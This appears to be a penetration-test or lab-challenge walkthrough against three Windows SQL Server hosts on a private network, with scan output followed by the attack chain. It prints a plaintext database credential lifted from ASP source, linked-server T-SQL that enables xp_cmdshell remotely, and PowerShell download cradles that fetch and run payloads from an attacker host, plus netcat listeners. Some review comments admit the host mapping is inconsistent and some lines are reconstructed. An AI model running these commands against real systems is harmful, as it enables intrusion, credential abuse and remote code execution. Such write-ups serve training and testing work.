Network
192.168.181.140
192.168.181.141
192.168.181.142
Rustscan
rustscan -a 192.168.181.140 192.168.181.141 192.168.181.142 --ulimit 5000 -- -Pn -sC -sV -oA challenge2
Open 192.168.181.140:80
Open 192.168.181.140:1433
Open 192.168.181.141:1433
Open 192.168.181.142:1433
Open 192.168.181.140:3389
Open 192.168.181.141:3389
Open 192.168.181.142:3389
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Music Inventory
| http-cookie-flags:
| /:
| ASPSESSIONIDQABTDSRD:
|_ httponly flag not set
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.181.140:1433:
| Target_Name: SQL11
| NetBIOS_Domain_Name: SQL11
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: sql11
| DNS_Computer_Name: sql11
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 192.168.181.140:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL11
| NetBIOS_Domain_Name: SQL11
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: sql11
| DNS_Computer_Name: sql11
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-13T07:27:25+00:00
| ssl-cert: Subject: commonName=sql11
| Issuer: commonName=sql11
| Public Key type: rsa
| Public Key bits: 2048
Running script "nmap -Pn -sC -sV -oA challenge2" on ip 192.168.181.142 (SQL53; line truncated in the paste, reconstructed from the rustscan command above)
PORT STATE SERVICE REASON VERSION
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.181.142:1433:
| Target_Name: SQL53
| NetBIOS_Domain_Name: SQL53
| NetBIOS_Computer_Name: SQL53
| DNS_Domain_Name: sql53
| DNS_Computer_Name: sql53
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| ms-sql-info:
| 192.168.181.142:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-03-13T07:27:41+00:00; +1m10s from scanner time.
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2024-03-13T07:27:41+00:00; +1m10s from scanner time.
| ssl-cert: Subject: commonName=sql53
| Issuer: commonName=sql53
| rdp-ntlm-info:
| Target_Name: SQL53
| NetBIOS_Domain_Name: SQL53
| NetBIOS_Computer_Name: SQL53
| DNS_Domain_Name: sql53
| DNS_Computer_Name: sql53
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-13T07:27:37+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Running script "nmap -Pn -sC -sV -oA challenge2" on ip 192.168.181.141 (SQL27; line truncated in the paste, reconstructed from the rustscan command above)
PORT STATE SERVICE REASON VERSION
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.181.141:1433:
| Target_Name: SQL27
| NetBIOS_Domain_Name: SQL27
| NetBIOS_Computer_Name: SQL27
| DNS_Domain_Name: sql27
| DNS_Computer_Name: sql27
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 192.168.181.141:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-03-13T07:27:53+00:00; +1m11s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL27
| NetBIOS_Domain_Name: SQL27
| NetBIOS_Computer_Name: SQL27
| DNS_Domain_Name: sql27
| DNS_Computer_Name: sql27
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-13T07:27:48+00:00
| ssl-cert: Subject: commonName=sql27
| Issuer: commonName=sql27
192.168.181.140 (SQL11 — IIS 10.0 "Music Inventory" on :80, MSSQL on :1433)
Authentication Bypass

Use sqlmap to get the reverse shell, then execute Sliver. The ASP source fragment below contains the application's plaintext SQL Server login (webapp11); that same credential is then used directly against 192.168.181.142.
' Classic ASP (VBScript) fragment recovered from the Music Inventory app on
' 192.168.181.140. Finding: a SQL Server login (UID/PWD for webapp11) is
' hard-coded in plaintext in the page source, so anyone who can read the
' source obtains a working database credential. How the source was read is
' not recorded here (the note above mentions sqlmap).
' SERVER=localhost -> the app talks to the SQL instance on the same host (SQL11).
ConnString="DRIVER={SQL Server};SERVER=localhost;UID=webapp11;PWD=89543dfGDFGH4d;DATABASE=music"
' ADODB connection/recordset objects; the connection is opened with the
' embedded credentials on every page load.
Set Connection = Server.CreateObject("ADODB.Connection")
Set Recordset = Server.CreateObject("ADODB.Recordset")
Connection.Open ConnString
' NOTE(review): the opening <% tag is not part of this paste; fragment starts mid-block.
%>
# impacket mssqlclient.py: SQL authentication with the webapp11 credential
# lifted from the ASP connection string (credential reuse across hosts).
# NOTE(review): the connection string pointed at localhost on .140 (SQL11),
# but this connects to .142, which the scan identifies as SQL53 — confirm
# which instance the linked-server queries below were actually issued from.
python3 mssqlclient.py webapp11:89543dfGDFGH4d@192.168.181.142
SQL27 (192.168.181.141) — reached as a linked server from the mssqlclient session
# Same connect command as above (duplicate paste); the T-SQL that follows is
# typed into this mssqlclient session. Password travels in the TDS login;
# the scan shows only a self-signed fallback certificate on the SQL ports.
python3 mssqlclient.py webapp11:89543dfGDFGH4d@192.168.181.142
-- Enumerate linked servers on the instance we are logged into.
-- master..sysservers also lists the local server itself, so a self-link
-- is possible; compare srvname against the hostnames from the scan.
select srvname from master..sysservers
-- Run a query ON SQL27 via the link. The remote context is whatever login
-- the link was created with, not webapp11; a 1 here means that link login
-- is sysadmin on SQL27, which the sp_configure calls below require.
select * from openquery("SQL27", 'SELECT is_srvrolemember(''sysadmin'')')
-- EXEC (...) AT [SQL27] only works when "rpc out" is enabled on the link;
-- 0 here means the AT calls below will fail with a "not configured for RPC" error.
select is_rpc_out_enabled FROM sys.servers WHERE name ='SQL27'
-- Enable xp_cmdshell on the REMOTE instance. "show advanced options" is
-- toggled on and back off, but xp_cmdshell itself stays enabled: this is a
-- persistent configuration change on SQL27 — record it and revert after the
-- engagement (sp_configure 'xp_cmdshell', 0).
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQL27];
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL27];
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [SQL27];
-- Command execution on SQL27 as the SQL Server service account: echo pipes a
-- download-cradle into powershell via stdin. The stager is fetched over plain
-- HTTP from the attacker host (192.168.45.195), and the doubled single quotes
-- are T-SQL nesting, not part of the command. xp_cmdshell waits for the
-- child to exit, so this call blocks the SQL session while the shell lives.
EXEC('EXEC xp_cmdshell ''echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.45.195:80/large1.ps1") | powershell -noprofile'';') AT [SQL27];
# Listener on the attacker host for the callback. large1.ps1 is not in these
# notes; presumably it connects back to 192.168.45.195:1234 — the port here
# must match whatever the stager uses.
nc -lvnp 1234
# Run inside the shell obtained above: second stage downloaded over plain
# HTTP and executed in memory with IEX (no integrity check on am.txt).
# am.txt is not in these notes; per the header it is likely the Sliver
# stager — confirm. DownloadString | IEX is a pattern AMSI/Defender commonly
# flags, so expect to need an evasion if the callback never arrives.
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX
SQL53 (192.168.181.142) — same linked-server hop, repeated for the second target
-- Same chain as for SQL27, aimed at the SQL53 link.
-- NOTE(review): the mssqlclient session above targets 192.168.181.142, which
-- the scan identifies as SQL53 itself; if that is accurate this is a self-link,
-- otherwise the session was really opened against a different host.
select srvname from master..sysservers
-- 1 = the link's login is sysadmin on SQL53 (needed for sp_configure below).
select * from openquery("SQL53", 'SELECT is_srvrolemember(''sysadmin'')')
-- "rpc out" must be 1 for EXEC (...) AT [SQL53] to work.
select is_rpc_out_enabled FROM sys.servers WHERE name ='SQL53'
-- Enable xp_cmdshell on SQL53; xp_cmdshell remains enabled after this —
-- persistent config change, revert after the engagement.
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQL53];
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL53];
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [SQL53];
-- Download-cradle piped into powershell on SQL53 (runs as the SQL Server
-- service account); fetches large1.ps1 over plain HTTP from 192.168.45.195
-- and blocks the SQL session until powershell exits.
EXEC('EXEC xp_cmdshell ''echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.45.195:80/large1.ps1") | powershell -noprofile'';') AT [SQL53];
# Listener for the SQL53 callback; same port as before, so make sure the
# earlier listener has been closed (or the stager uses a different port).
nc -lvnp 1234
# Second stage on SQL53: am.txt pulled over plain HTTP and executed in
# memory (no integrity check). Contents of am.txt are not in these notes.
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX